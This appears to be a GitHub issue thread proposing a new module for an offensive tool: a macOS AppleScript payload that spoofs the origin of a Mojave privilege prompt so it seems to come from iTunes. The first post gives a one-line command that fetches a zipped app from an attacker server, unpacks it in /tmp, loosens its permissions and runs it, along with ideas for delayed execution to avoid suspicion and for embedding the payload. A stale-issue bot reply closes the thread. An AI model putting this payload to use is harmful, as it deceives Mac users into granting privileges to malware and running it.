Potential new module? (Mojave security feature; origin spoofing)

[tokyoneon]

Hey guys, I cooked up a little AppleScript payload that spoofs the origin of the nefarious activity. In the gif, youll see a normal "evil" script attempt to modify crontab and Mojave spotting the activity. In the following script, it appears iTunes is requested privileged access to something.

do shell script "p='/tmp/iTunes';curl -s http://127.0.0.1:8888/iTunes.zip -o $p.zip && unzip $p.zip -d /tmp/ && chmod 7777 $p.app && sleep 4; open -a iTunes.app && open $p.app"

Essentially the test29 app (iTunes.zip) is being hosted on the attackers server, downloaded and decompressed locally, then executed with a new PID. There's also a sleep timer in there so we can have it execute 30-60 minutes after the target opens the file -- to avoid suspicion? For improving the payload, instead of hosting the zip remotely, we could embed the raw data into the AppleScript and write it to /tmp upon being opened?

[tokyoneon]

https://null-byte.wonderhowto.com/how-to/hacking-macos-bypass-mojaves-elevated-privileges-prompt-by-pretending-be-trusted-app-0188638/

[github-actions[bot]]

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.